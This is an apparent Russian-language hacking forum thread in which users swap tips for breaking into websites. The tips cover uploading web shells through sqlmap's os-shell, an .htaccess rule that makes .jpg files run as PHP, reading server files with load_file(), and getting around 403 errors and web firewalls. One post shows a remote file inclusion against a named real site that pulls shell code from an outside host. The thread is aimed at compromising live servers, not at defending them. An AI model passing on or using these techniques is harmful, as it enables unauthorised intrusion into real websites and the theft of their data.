Я не профи конечно , но os_shell заливает файл аплоидер на сервер, через который ты можешь заливать файлы или сразу заливать шел и если поверёт, не всегда конечно попадаешь в шел БД, где можешь делать запросы. sql-shell ты сразу попадаешь в шел бд
Тогда можно надеется что будет возможность прочитать файлы, очень далеко не всегда такое есть при файл прив Н
Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.
Это из категории file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime ? А такое бывает? Зачем тогда как jpg загружать?
Так, вроде jpg можно интерпретировать как скрипт! .htaccess Code: RemoveHandler .jpg AddType application/x-httpd-php .jpg
Подскажите как определить правельность пути /home/admin/sites/ Нашел скулю.Нашел полный путь.Пытаюсь залить шелл пишет ошибку 403
load_file('/home/u232323/public_html/index.php') если уж нет доверия к логам. 403 доступ запрещён , waf есть?
А можете помочь в понимании этой уязвимости?) http://www.prodisney.ru/index.php?page=http://site/shell.txt? Отображает код шелла. А в таком виде http://www.prodisney.ru/index.php?page=http://site/shell.php Отображает мой хостинг.
если у юзера sql нет FILE PRIVILEGES то писать ничего на сервер не получится через инжект если нет STACKED QUERIES, а в сетапе PHP-MYSQL их обычно нет, то кроме селектов из БД мало что можно придумать